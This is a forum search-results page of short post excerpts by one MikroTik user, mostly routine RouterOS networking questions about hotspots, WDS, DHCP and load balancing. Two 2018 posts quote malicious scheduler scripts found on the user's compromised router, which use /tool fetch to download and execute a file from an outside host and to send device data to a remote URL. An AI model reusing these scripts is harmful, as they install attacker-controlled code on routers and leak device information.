Community discussions

Search found 83 matches

by schiele
Wed Jul 24, 2019 12:47 am
Forum: Scripting
Topic: bypassing non CDP MAC address into hotspot
Replies: 0
Views: 288

bypassing non CDP MAC address into hotspot

In referencing ( https://forum.mikrotik.com/viewtopic.php?t=82245 ) I'm trying to create a 'bypass' binding rule for the hotspot based on finding 'active host names' in the DHCP server leases that would be unique to a given hardware vendor and then create the binding rule....so for example previousl...
by schiele
Thu Jul 12, 2018 7:19 pm
Forum: General
Topic: found this on my router today!
Replies: 3
Views: 978

Re: found this on my router today!

Also this was in the scheduler, any ideas why the attackers would be fetching this??? :if ([/file find name=autosupout1.rif]="") do={ :local ssip [:resolve jt.25u.com server=8.8.8.8] /tool fetch url="http://$ssip:81/autosupout1.rif" dst-path=autosupout1.rif } execute [/file get autosupout1.rif conte...
by schiele
Thu Jun 28, 2018 11:05 pm
Forum: General
Topic: found this on my router today!
Replies: 3
Views: 978

found this on my router today!

noticed an unauthorized connect to my router, did a 'export compact' and saw some recent scripts added, along with scheduler....sucks! This was the script.....not sure what it does though.... {/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=5bc24d5c0d21bf27&action=upload&sncode=AADA5F...
by schiele
Fri May 11, 2018 9:55 pm
Forum: General
Topic: LHG AC restart with kernel reboot msg in log
Replies: 7
Views: 941

Re: LHG AC restart with kernel reboot msg in log

Hi, wondering if this issue is still continuing....any others with issues on the XL 5ac versions? thanks :)
by schiele
Sat Feb 17, 2018 9:38 pm
Forum: RouterBOARD hardware
Topic: SFP router in RB750 FF
Replies: 1
Views: 432

SFP router in RB750 FF

Is powerbox pro the only router with SFP capability, I am looking for a small size, so not RB2011 and an indoor version similar in size of the GSP260 running ROS. Perhaps I overlooked all models, thank you for the feedback!

Cheers
by schiele
Wed Nov 08, 2017 4:42 am
Forum: General
Topic: Killer uptime :)
Replies: 1
Views: 455

Killer uptime :)

its gotta be a bug, pretty cool though :)
by schiele
Thu Sep 14, 2017 1:33 am
Forum: RouterBOARD hardware
Topic: best integrated board for vehicle mount
Replies: 10
Views: 1443

Re: best integrated board for vehicle mount

how about LTE modem, I want to ensure I can set a static Ip on the mikrotik LTE interface, but I hear the Huawei sticks are only NAT modem, DMZ as an option, but have not tried this yet. Any suggestions on an LTE stick that works well as bridge and compatible with mikrotik hAP ac lite?

thank you :)
by schiele
Thu Sep 07, 2017 12:37 am
Forum: RouterBOARD hardware
Topic: best integrated board for vehicle mount
Replies: 10
Views: 1443

Re: best integrated board for vehicle mount

How much LTE data do you find users consume on average in a month? Do you rate plan the users?
by schiele
Wed Sep 06, 2017 7:46 pm
Forum: RouterBOARD hardware
Topic: best integrated board for vehicle mount
Replies: 10
Views: 1443

Re: best integrated board for vehicle mount

Thankyou for the tips on compatible hardware, If a person was interested in contacting you on your config and setup, how would we go about doing this please.

Cheers!
by schiele
Wed Jul 26, 2017 12:53 am
Forum: RouterBOARD hardware
Topic: best integrated board for vehicle mount
Replies: 10
Views: 1443

best integrated board for vehicle mount

I have a request for some touring agencies to mount an RB with LTE/3G ability, I thought in a past newsletter there was a rugged AP in the works, was I imagining this? Anyways, perhaps there is something better from MT that you guys are using, I would love to hear some feedback please.

Cheers!
by schiele
Tue May 05, 2015 3:22 am
Forum: General
Topic: winbox central DB for multiple devices
Replies: 2
Views: 562

winbox central DB for multiple devices

Good day all,

does the new winbox version allow to store a central DB to share for multiple devices using winbox?
I know I could run the dude to do something similar, just wondering if winbox has the power to share a database.

thank you,
by schiele
Tue Jan 27, 2015 6:12 pm
Forum: General
Topic: if winbox was a boys band I hope it would be called N'Sync
Replies: 6
Views: 1095

Re: if winbox was a boys band I hope it would be called N'Sy

winbox v3!!! yay looks like you allow for the sync request via dropbox I requested awhile back, thank you mikrotik, very much appreciated and made my day!! keep up the great work please.

Cheers!
by schiele
Thu Oct 30, 2014 9:47 pm
Forum: Virtualization
Topic: Asterisk on Metarouter MOH
Replies: 4
Views: 6281

Re: Asterisk on Metarouter MOH

Nathan -- I would like to test out the image you have created and was wondering if you have a link to the site where your packages resides, as well do you have a decent guide
to support this scenario for asterisk on metarouter? appreciate your help.

Thank you.
by schiele
Tue Jun 24, 2014 1:35 am
Forum: Beginner Basics
Topic: capsman setup guide
Replies: 5
Views: 17783

Re: capsman setup guide

that guide is a good one, I got my AP's controlled in CAPsMAN now....I had to change some interfaces by making my CAP1-CAP4 in a bridge with ether2-local-master and change around some DHCP interface and IP address interface, but once that was done everything came up really good. Aside form that, doe...
by schiele
Fri Jun 20, 2014 8:40 am
Forum: Beginner Basics
Topic: capsman setup guide
Replies: 5
Views: 17783

capsman setup guide

Can someone post what all needs to be configured for CAPsMAN to function properly, i can't seem to get it going despite all the mikrotiks are on 6.15....not sure how to activate it. Maybe this has already been asked in which case just a simple point me in the right direction would be nice. ****UPDAT...
by schiele
Thu Jun 19, 2014 4:48 am
Forum: Scripting
Topic: does this exist for an interface already...
Replies: 4
Views: 1047

Re: does this exist for an interface already...

oh hey, thanks for your response, I will have to check webfig again, i really don't remember seeing anything on load balancing in the configuration, are you sure about that? anyways I will check it out. Its one of the only options i'm really looking for to be honest, load balancing and fail-over, qu...
by schiele
Wed Jun 18, 2014 11:52 pm
Forum: Scripting
Topic: does this exist for an interface already...
Replies: 4
Views: 1047

does this exist for an interface already...

Hello all, I am wondering if someone has built an easy interface for ROS already to do some basic functions and easy configuration. I would like to be able to send an RB450G to a client and have them plug in directly to pull up an interface page to go through the setting up of the mikrotik, things l...
by schiele
Sat Apr 05, 2014 7:18 pm
Forum: RouterBOARD hardware
Topic: New hardware - mAP
Replies: 154
Views: 51283

Re: New hardware - mAP

Do you know the size of that little critter, post some dimensions please.

As well what is the output power on the radio...

thank you!
:)
by schiele
Thu Apr 03, 2014 1:30 am
Forum: General
Topic: change the port of a source IP for monitoring AP behind NAT
Replies: 2
Views: 606

change the port of a source IP for monitoring AP behind NAT

Hello, I am trying to monitor some AP's that are NAT'd for my Zabbix system, I would like to setup a mangle rule to strip the snmp port on that source IP and excahnge it for a sequential port for the 10 access points needing to be monitored. for example port 40001...40002...etc. for each AP. Can thi...
by schiele
Mon Mar 10, 2014 10:08 pm
Forum: General
Topic: Mikrotik Hotspot and IOS7 CNA problems
Replies: 30
Views: 26721

Re: Mikrotik Hotspot and IOS7 CNA problems

Good day,

I see alot of problems with this also, has anyone tested to see if there is a solutions that has been solved for this?

:)
by schiele
Mon Jun 10, 2013 8:06 pm
Forum: General
Topic: RB2011-RM front label design possible
Replies: 2
Views: 891

Re: RB2011-RM front label design possible

Free reign!!! you don't have to tell me twice. thank you Sir.

someone wouldn't happen to have exact measurements for the various models on this front label perhaps.

Cheers.
by schiele
Sun Jun 09, 2013 11:23 pm
Forum: General
Topic: RB2011-RM front label design possible
Replies: 2
Views: 891

RB2011-RM front label design possible

Hello, I've been using the RB2011-RM for alot of clients and I would like to change the front 'look and feel' if this is allowable and doesn't conflict with any copyright legalities. I would still like to keep the mikrotik and routerboard fonts on the front but change up the colors and add company b...
by schiele
Wed May 15, 2013 6:33 am
Forum: General
Topic: proxy issues...or something else? its a mystery
Replies: 1
Views: 390

proxy issues...or something else? its a mystery

Hello, I've attached a screenshot of my logs on a hotspot i have running, getting these proxy errors and although its not affecting users I would like to get these errors to quit filling my logs, checked the web proxy and it's not enabled, nor should it be in my scenario. perhaps someone else can of...
by schiele
Wed May 15, 2013 1:48 am
Forum: General
Topic: if winbox was a boys band I hope it would be called N'Sync
Replies: 6
Views: 1095

Re: if winbox was a boys band I hope it would be called N'Sy

Good suggestion on the Dude, I did take that into account with the dude populating the IP's and it would do the trick. However I would rather not install the dude on every machine I have, winbox is lightweight and meant for locations list(hosts), I just think its lacking synchronization features, I ...
by schiele
Wed May 15, 2013 1:43 am
Forum: General
Topic: DHCP lease without success!!! shoot me now.
Replies: 8
Views: 4390

Re: DHCP lease without success!!! shoot me now.

I am using the same ssid as you mentioned across all my AP's, however I have been noticing less and less of these errors and I have not made a change to the network or ssid's. Literally no changes at all. It was so bad I was willing to try changing the ssid on all AP's and then one day it appeared t...
by schiele
Fri May 10, 2013 1:06 am
Forum: General
Topic: Offering lease without success
Replies: 2
Views: 4298

Re: Offering lease without success

ya I had this problem awhile back, the router was going bazzerk in the logs with these entries. There wasn't any mpls in my config, pretty simple, pretty flat. After a few days of trying a few things that didn't work the logs started to become less and less and now I only see it a couple of times a ...
by schiele
Fri May 10, 2013 12:45 am
Forum: General
Topic: if winbox was a boys band I hope it would be called N'Sync
Replies: 6
Views: 1095

if winbox was a boys band I hope it would be called N'Sync

Greeting! my problem....too many winbox instances across too many computers, its high time they Sync up together! who's with me!!! There's probably a stupid easy solution, and if not I really hope that this feature could be built into winbox some glorious day. I have like 6 machines(desktops,server,...
by schiele
Tue Apr 02, 2013 7:12 pm
Forum: General
Topic: DHCP lease without success!!! shoot me now.
Replies: 8
Views: 4390

Re: DHCP lease without success!!! shoot me now.

Are you sure it's a /23 network? 192.168.50.0/24 and 192.168.53.0/24 can't possibly be in the same /23 network... For them to be in the same network it would have to be a /22 at least.
Hello, and thanks for the correction, it was meant to say /21 network, hope this clarifies things.
by schiele
Mon Apr 01, 2013 11:59 pm
Forum: General
Topic: DHCP lease without success!!! shoot me now.
Replies: 8
Views: 4390

Re: DHCP lease without success!!! shoot me now.

You have 2 networks 192.168.53.x and 192.168.50.x in dhcp1 server ??? maybe that's your problem... thanks for the feedback, what you can't see is that this is a /23 network, this is why you are seeing the current range of addresses. not your fault. that said I even have these same issues on /24 net...
by schiele
Tue Mar 26, 2013 2:34 am
Forum: Wireless Networking
Topic: Wall Jack APs
Replies: 18
Views: 3539

Re: Wall Jack APs

just off topic, what AP are you having success with now then if you have moved away from MT Access points?

thanks
by schiele
Fri Mar 08, 2013 5:46 am
Forum: General
Topic: DHCP lease without success!!! shoot me now.
Replies: 8
Views: 4390

DHCP lease without success!!! shoot me now.

holy moly, i'm going to lose my mind. so many support calls from this client this week, I have this gateway(rb2011 rackmount) that feeds 7 rb751u's directly off the ports ether2-9 on a bridge. I am seeing nothing but 'DHCP offering lease without success' errors. I had one guest who had a PC laptop,i...
by schiele
Tue Feb 05, 2013 11:54 pm
Forum: SwOS
Topic: RB250 bytes conversion -- help please
Replies: 0
Views: 1410

RB250 bytes conversion -- help please

Hello, i'm trying to convert the tx/rx on the rb250 and it is currently reading bytes(can this be changed?) anyways for example the tx is reading 1868871230 and the rx is reading 2957343699 what does this convert out to in Mbps (mega bits per second) apreicate your help and a quick lesson on how I c...
by schiele
Tue Oct 09, 2012 8:32 am
Forum: General
Topic: proper SFP module for backbone config
Replies: 0
Views: 1971

proper SFP module for backbone config

ahhh first off sorry if this isn't the proper place to post this question, maybe hardware would be a better spot for it. Anyways i'm trying to to find out if the RB2011 with SFP is going to be capable of doing a Fiber backbone across 8 floors that stack upon each other, i do not have enough knowledg...
by schiele
Fri Jul 06, 2012 9:22 pm
Forum: General
Topic: Wireless connection droppping on RB951-2n
Replies: 24
Views: 6948

Re: Wireless connection droppping on RB951-2n

interesting...so were you able to find a work around in your case?
by schiele
Fri Jul 06, 2012 7:44 pm
Forum: General
Topic: Wireless connection droppping on RB951-2n
Replies: 24
Views: 6948

Re: Wireless connection droppping on RB951-2n

I did not....but I put them all into a big black magicians hat and shook it all up and grabbed one lucky rb951 from the bag of tricks....isn't that everyone does it? :-)

Cheers!
by schiele
Fri Jul 06, 2012 7:24 pm
Forum: General
Topic: Wireless connection droppping on RB951-2n
Replies: 24
Views: 6948

Re: Wireless connection droppping on RB951-2n

I too was nervous about the dropping issue, has this been resolved on 5.18? I still went ahead with ordering 2 dozen units for some projects, glad that I took one out to test this issue out in the lab. Running fine for 2 days and then this morning....boom! no wireless....*sigh* :-/ Too bad...sending...
by schiele
Thu May 31, 2012 7:15 pm
Forum: General
Topic: PCC load balancing but winbox in on only 1 ISP
Replies: 9
Views: 1823

Re: PCC load balancing but winbox in on only 1 ISP

Hello, problem still persists, any other suggestions please. appreciate it.

Thanks. :)
by schiele
Fri May 25, 2012 6:59 pm
Forum: General
Topic: PCC load balancing but winbox in on only 1 ISP
Replies: 9
Views: 1823

Re: PCC load balancing but winbox in on only 1 ISP

thanks for the suggestion but if you see above in the mangle config I have set already what you mentioned... add action=mark-routing chain=output connection-mark=WAN1_conn disabled=no \ new-routing-mark=to_WAN1 passthrough=yes add action=mark-routing chain=output connection-mark=WAN2_conn disabled=n...
by schiele
Tue May 22, 2012 10:37 pm
Forum: General
Topic: Hotspot and iphone/ipad autofill
Replies: 9
Views: 7641

Re: Hotspot and iphone/ipad autofill

session timeouts seem interesting....looking over the hotspot settings looks like my session timeouts are set to 'none' and not set at all. that said I do have my idle timeouts set to 1 hour and the keep alive timeouts at the default 1min. Whats with all the 'timeouts' these are confusing me. Can so...
by schiele
Tue May 22, 2012 9:43 pm
Forum: General
Topic: Hotspot and iphone/ipad autofill
Replies: 9
Views: 7641

Re: Hotspot and iphone/ipad autofill

I have hotspots at various hotels and a lot of people are having this same issue with apple devices(i.e.. iPod,iPad,iPhones and MacBooks) I am trying to resolve this quickly and I too have tried to add http://www.apple.com/library/test/success.html to the walled garden. with no luck, further more if...
by schiele
Tue May 22, 2012 8:26 pm
Forum: General
Topic: PCC load balancing but winbox in on only 1 ISP
Replies: 9
Views: 1823

Re: PCC load balancing but winbox in on only 1 ISP

can you please explain what mangle rules are missing, appreciate that.

Thank you.
by schiele
Wed May 02, 2012 5:27 pm
Forum: General
Topic: PCC load balancing but winbox in on only 1 ISP
Replies: 9
Views: 1823

Re: PCC load balancing but winbox in on only 1 ISP

Does this provide any insight into my problem?

Thanks

:D
by schiele
Fri Apr 27, 2012 9:45 pm
Forum: General
Topic: PCC load balancing but winbox in on only 1 ISP
Replies: 9
Views: 1823

Re: PCC load balancing but winbox in on only 1 ISP

:D Yes absolutely. Here is the info you requested. thanks. /ip route> print detail Flags: X - disabled, A - active, D - dynamic, C - connect, S - static, r - rip, b - bgp, o - ospf, m - mme, B - blackhole, U - unreachable, P - prohibit 0 A S dst-address=0.0.0.0/0 gateway=70.76.0.1 gateway-status=70....
by schiele
Thu Apr 26, 2012 11:57 pm
Forum: General
Topic: PCC load balancing but winbox in on only 1 ISP
Replies: 9
Views: 1823

PCC load balancing but winbox in on only 1 ISP

Just setup PCC load balance for 2 ISP connections. It's working great, balancing the traffic....only problem is that I can only ping the second ISP from remote and as well I cannot winbox into the ISP that the ping does not respond to. Is this a simple route issue? an suggestion would be appreciated...
by schiele
Sat Apr 21, 2012 5:30 pm
Forum: General
Topic: PCC load balance...what am I doing wrong....eeep!
Replies: 2
Views: 1482

Re: PCC load balance...what am I doing wrong....eeep!

:D

Yep...that was it!!! good eye. thank you Sir. :)
by schiele
Fri Apr 20, 2012 8:20 am
Forum: General
Topic: PCC load balance...what am I doing wrong....eeep!
Replies: 2
Views: 1482

PCC load balance...what am I doing wrong....eeep!

I have traffic passing fine out WAN1 but only a trickle going out WAN2 for some reason...anyways first time trying out PCC load balancing so I got tired of not knowing the mangle rules very confidently and how this works, i thought I would post my config for you pro's....if you can see that my confi...
by schiele
Wed Feb 01, 2012 8:32 am
Forum: General
Topic: DHCP pool leased out too quickly...need more IP addys
Replies: 3
Views: 571

DHCP pool leased out too quickly...need more IP addys

without having to segment my network into smaller networks I am wondering how i can setup my dhcp server so that it isnt leasing out all of the IPs from the pool....any suggestions...all of the IPs get leased and then guests are not able to get onto the network....i want to avoid this some way. than...
by schiele
Sun Oct 02, 2011 1:55 am
Forum: Wireless Networking
Topic: Antenna mode??? a or b or both?
Replies: 3
Views: 1036

Antenna mode??? a or b or both?

Hi there, Just need a hand explaining how RouterOS uses the Antenna mode, in the past Ihave always just used one antenna and selected antenna 'a' under antenna mode. i am wondering if there are any advantages to using 2 omni's and then selecting to use antenna A for Rx and Antenna B for Tx. Can some...
by schiele
Wed Jan 19, 2011 9:19 pm
Forum: Wireless Networking
Topic: WDS issue with user, connecting and disconnecting
Replies: 0
Views: 366

WDS issue with user, connecting and disconnecting

Hello folks, I have a small wireless network setup with with 4 mikrotik AP's setup in Static WDS on a bridge(includes Ether1 and WLAN interfaces) all AP's are set with the default TX power settings on the radios. I have one AP wired to an RB750G for the Master AP and like I said the other AP's on a ...
by schiele
Wed Oct 13, 2010 1:09 am
Forum: General
Topic: gather peak WAN usage
Replies: 3
Views: 548

Re: gather peak WAN usage

Yes thanks, Just wondering if there is a tool that will gather and store the stats so that I wouldn't have to be connected to that RB to see the graphs.

Thank you
by schiele
Tue Oct 12, 2010 8:49 pm
Forum: General
Topic: gather peak WAN usage
Replies: 3
Views: 548

gather peak WAN usage

Hi there, I have a variety of routerboards at various clients and I am wanting to know a way of monitoring the WAN usage throughout the day and discover peak usage times, trying to understand if my bandwidth is sufficient for each site, If I need to setup Nagios , cacti or Dude for this to gather th...
by schiele
Wed Aug 11, 2010 7:52 pm
Forum: General
Topic: latest RouterOS for RB1100
Replies: 4
Views: 782

Re: latest RouterOS for RB1100

Yes. i see now, thank you. it is very clear now. for some reason I was thinking 4.1.1, not the case.

I will post if the upgrade fixes the Hotspot user issues.

Cheers!
by schiele
Wed Aug 11, 2010 4:31 am
Forum: General
Topic: latest RouterOS for RB1100
Replies: 4
Views: 782

Re: latest RouterOS for RB1100

Thank you.

I may have to revert back to a stable 4.11 ROS for now to see if it will correct the issue. Why do I not see ROS 4.7 available for download?

Thanks.
by schiele
Wed Aug 11, 2010 2:25 am
Forum: General
Topic: latest RouterOS for RB1100
Replies: 4
Views: 782

latest RouterOS for RB1100

Hi there, Does anyone know the latest version for the RB1100 and where this can be downloads from. i am having issues, hotspot seems to be handing out IP but no users are able to surf. nor is there any splash screen that shows up within the browser for authentication, a quick disable and then enable...
by schiele
Wed Sep 09, 2009 5:11 pm
Forum: General
Topic: Routing without NAT enabled
Replies: 1
Views: 534

Re: Routing without NAT enabled

***update*** http://robin.forumup.it/about1014-robin.html This is still a feature alot of people are facing, but the future appears to have a silver lining.....the next release of ROBIN will have support for what I want to achieve. The problem with OM is that it won't let DHCP and NAT be controlled ...
by schiele
Wed Sep 09, 2009 8:36 am
Forum: General
Topic: Routing without NAT enabled
Replies: 1
Views: 534

Routing without NAT enabled

Hi there, I think there has been other posts related to Public IP routing without NAT, but it just seems that every network has it's differences. I have 6 OM(open-mesh) access points that I want to setup behind a RB532 that will take care of DHCP and hotspot server, I have been told that the OM1P ac...
by schiele
Thu Sep 03, 2009 4:59 pm
Forum: RouterBOARD hardware
Topic: RB493ah ethernet ports stop routing then restarts
Replies: 33
Views: 9100

Re: RB493ah ethernet ports stop routing then restarts

Greetings! Wondering if this issue has been corrected from MikroTik yet, I have the same poor results from 2 of the RB493's deployed at a couple of Hotels, the one seems to be more reliable than the other, but I still have to remote reboot this device every other day for a quick fix. I have RB1000's...
by schiele
Thu Jul 16, 2009 1:19 am
Forum: Wireless Networking
Topic: Hotspot issues...clients MAC showing up as AP MAC on hotspot
Replies: 5
Views: 1040

Re: Hotspot issues...clients MAC showing up as AP MAC on hotspot

****Update****

This issue happened to be related to one of my AP's in the WDS had a firewall rule that should not have been in place, removed this rule and Voila!!!
Things work great now!

Hope this helps someone else!
by schiele
Tue Jul 14, 2009 11:15 pm
Forum: The Dude
Topic: firewall rule to allow SNMP traffic
Replies: 4
Views: 3332

Re: firewall rule to allow SNMP traffic

:-) Your patience is greatly appreciated, sorry to make things confusing, I hope the image will make better sense of my exact layout for my sites. I am trying to understand your suggestion, please bare with me Sir. Here is the part from what you mentioned that I am not totally sure how to do: "To do...
by schiele
Mon Jul 13, 2009 11:00 pm
Forum: The Dude
Topic: firewall rule to allow SNMP traffic
Replies: 4
Views: 3332

Re: firewall rule to allow SNMP traffic

Thanks for the response Sir. I have tried the VPN approach on one site and it works well, however I am just wondering if this will work on multiple sites at each location with a different public IP on each site, internal IP range is the same however for all sites, will this confuse the SNMP server a...
by schiele
Thu Jul 09, 2009 6:21 am
Forum: The Dude
Topic: firewall rule to allow SNMP traffic
Replies: 4
Views: 3332

firewall rule to allow SNMP traffic

Here is my situation.....I have a private network at a Hotel, five Access Points to Cover this property which are all RB CRD, they are wired back to a RB 450 used for my gateway and Hotspot Server, right now I am able to recieve SNMP trap info from the gateway just fine, but not from the Access Poin...
by schiele
Wed Jul 08, 2009 4:11 am
Forum: Beginner Basics
Topic: opening ports to allow AP's forward SNMP traps
Replies: 0
Views: 443

opening ports to allow AP's forward SNMP traps

Hi there! Here is my situation.....I have a private network at a Hotel, five Access Points to Cover this property which are all RB CRD, they are wired back to a RB 450 used for my gateway and Hotspot Server, right now I am able to recieve SNMP trap info from the gateway just fine, but not from the A...
by schiele
Tue Jun 02, 2009 8:49 pm
Forum: Wireless Networking
Topic: Track a client from which AP they are registered too
Replies: 4
Views: 699

Re: Track a client from which AP they are registered too

Thanks for the reply Sir. I have thought about deviding up the AP's to their own Network but it doesn't seem practical right now, plus I have the AP's in WDS. Anyways you would think there would be a simple way to see what AP a user is registered to. This would give you an idea of what area they are...
by schiele
Fri May 29, 2009 12:15 am
Forum: Wireless Networking
Topic: Track a client from which AP they are registered too
Replies: 4
Views: 699

Track a client from which AP they are registered too

Hi there, Sorry for the simple question, still learning ROS but bassically what I am trying to do is track down from the Gateway(mikrotik) to which AP a client is connected(registered) too, so if the Location has got 6 AP's in WDS(all mikrotiks) and a client is connected to one of those 6 AP's, is t...
by schiele
Thu Apr 02, 2009 6:45 pm
Forum: General
Topic: Hotspot proper config issues
Replies: 2
Views: 431

Re: Hotspot proper config issues

As you can see the Master AP(192.168.2.2) that has ethernet wired to it from the RB493 is showing up in the hosts multiple times, I have tried up'ing the 'addresses per MAC' this has not changed anything, you can see below I have binding setup for the 4 AP's, and I am still seeing the 'D' flags for ...
by schiele
Thu Apr 02, 2009 9:09 am
Forum: General
Topic: Hotspot proper config issues
Replies: 2
Views: 431

Hotspot proper config issues

Hi there, I am trying to sort out some problems with a newly created hotspot server, as you can see from the screenshot below under the 'hosts' tab, all AP's(192.168.2.2,3,4 and 5) are showing up as "D" flags, I have not yet setup binding but will soon, even so once I have done this I dont understan...
by schiele
Thu Apr 02, 2009 7:08 am
Forum: Wireless Networking
Topic: ports not showing a 'running' state on RB493, but they work?
Replies: 1
Views: 287

Re: ports not showing a 'running' state on RB493, but they work?

just wanted to add some more details on the site, the RB493 is only using eth2 that as said earlier is feeding an AP, from that one AP I have a WDS system setup feeding 3 more AP's(4 in total) all in Dynamic WDS, that part is working great as ussual! As you can see the eth2 interface is not even sho...
by schiele
Thu Apr 02, 2009 4:08 am
Forum: Wireless Networking
Topic: ports not showing a 'running' state on RB493, but they work?
Replies: 1
Views: 287

ports not showing a 'running' state on RB493, but they work?

Hi there, Just wondering if this is hardware being faulty or a routerOS problem, if you see the screenshot below I am using the RB493, 9 ports in total, eth1 is for the WAN currently. Problem is that I cannot get eth2,3 and 4 to show a 'running' state, although I have eth2 running to an AP on site, ...
by schiele
Sat Mar 07, 2009 8:43 pm
Forum: Wireless Networking
Topic: APs in WDS causing traffic loop?
Replies: 10
Views: 1552

Re: APs in WDS causing traffic loop?

did notice that a route had not been added back to gateway, i've since added dst-address 0.0.0.0/0 and gateway 192.168.2.1 to the route list on each AP, would this have caused the traffic loop, I havn't been able to get back to Enable the conflicting AP, just wondering if this lack of routing might ...
by schiele
Sat Mar 07, 2009 8:08 am
Forum: Wireless Networking
Topic: APs in WDS causing traffic loop?
Replies: 10
Views: 1552

Re: APs in WDS causing traffic loop?

Yes I have seen the WDS cost, not sure how this work sadly, can you please explain this?

Thank you.
by schiele
Thu Mar 05, 2009 7:24 am
Forum: Wireless Networking
Topic: APs in WDS causing traffic loop?
Replies: 10
Views: 1552

Re: APs in WDS causing traffic loop?

I was wondering what you meant by connecting to more than one AP, under the wireless registration I see the other AP in WDS, all of them.(4) so to me I would think that it would be connecting to all APs, is this not right, or rather where should I be looking for which it is connecting too, thanks an...
by schiele
Wed Mar 04, 2009 3:36 am
Forum: Wireless Networking
Topic: APs in WDS causing traffic loop?
Replies: 10
Views: 1552

Re: APs in WDS causing traffic loop?

Thankyou. The AP's(clients) are in AP Bridge not 'station WDS'. So all AP's in AP Bridge with WDS set as Dynamic mode and on Bridge1, This is what I was wondering if it would make most sense to setup all AP's in AP Bridge with Dynamic WDS, I have used this on other sites and it seems to be just fine...
by schiele
Mon Mar 02, 2009 7:14 am
Forum: Wireless Networking
Topic: APs in WDS causing traffic loop?
Replies: 10
Views: 1552

Re: APs in WDS causing traffic loop?

All of the AP are the RB-CrossRoads with RouterOS 2.9.5 so I did not see the RSTP in that firmware, as being outdated I will try to update to at least 3.13 or 3.20 and then enable RSTP to see what will become of it, later in the week. Does anyone know if this is the best way to set this up with mult...
by schiele
Mon Mar 02, 2009 2:27 am
Forum: Wireless Networking
Topic: APs in WDS causing traffic loop?
Replies: 10
Views: 1552

APs in WDS causing traffic loop?

Hi there, I'm not sure what is causing this but...I have 4 APs in WDS right now working fine, when I try adding the 5th this is where I notice a surge of traffic bouncing around the Network, as you can see from the snapshot it looks like 2.1Gbps of traffic that will appear and then quickly disappear...
by schiele
Wed Feb 25, 2009 4:50 am
Forum: Wireless Networking
Topic: what is the max AP's in WDS-mesh
Replies: 3
Views: 823

Re: what is the max AP's in WDS-mesh

anyone know how many AP in WDS mesh can be used together?

Thank you
by schiele
Tue Feb 17, 2009 8:14 pm
Forum: Wireless Networking
Topic: Hotspot issues...clients MAC showing up as AP MAC on hotspot
Replies: 5
Views: 1040

Re: Hotspot issues...clients MAC showing up as AP MAC on hotspot

Oddly the WatchDog Timer had been activated and did not have an IP to Watch and therefor was rebooting all the time.

disabled the timer.....and voila!

Cheers!
by schiele
Tue Feb 17, 2009 5:37 am
Forum: Wireless Networking
Topic: what is the max AP's in WDS-mesh
Replies: 3
Views: 823

what is the max AP's in WDS-mesh

I have a large Hotel Porject I am submitting an estimate for, I have used the RB CrossRoads in WDS-mesh on some of my past clients, usually at the most they have required 5 to 7 AP's in dynamic WDS, this has worked beautiful but now I am facing a large hotel that would require roughly 15-20 AP's and...
by schiele
Tue Feb 10, 2009 3:24 am
Forum: Wireless Networking
Topic: Hotspot issues...clients MAC showing up as AP MAC on hotspot
Replies: 5
Views: 1040

Re: Hotspot issues...clients MAC showing up as AP MAC on hotspot

Hi SurferTim. Thanks for the reply so quickly. I read a document a week ago in regards to your response so I had tried changing the address-per-mac to 250 and this didn't make any difference, although in theory it should have corrected the problem, I have a screenshot of the host window and you can ...
by schiele
Mon Feb 09, 2009 8:44 pm
Forum: Wireless Networking
Topic: Hotspot issues...clients MAC showing up as AP MAC on hotspot
Replies: 5
Views: 1040

Hotspot issues...clients MAC showing up as AP MAC on hotspot

Greetings! my issue is with the Hotspot server that is as well my main gateway/router, my setup I have 2 root AP's that are in WDS to 3 others in total for 5 AP on this site. when the hotspot is disabled I have no problems connecting, get an IP and online successfully. However once I enable the hot...
by schiele
Thu Oct 16, 2008 6:10 am
Forum: General
Topic: Setup netwatch to email admin
Replies: 3
Views: 637

Re: Setup netwatch to email admin

Hey that worked great, i suppose it is similar for adding a script to the 'up' tab to be notified if it comes back up, right?

Anyways I appreciate the help, it never goes unnoticed.

Cheers!


Schiele.
by schiele
Wed Oct 15, 2008 7:21 am
Forum: General
Topic: Setup netwatch to email admin
Replies: 3
Views: 637

Setup netwatch to email admin

Sorry for the Noob question, I have setup Netwatch for a couple of devices on a Network, i would like to be notified when any device fails, is there a script for what i am trying to accomplish?

Appreciate your help.

:-)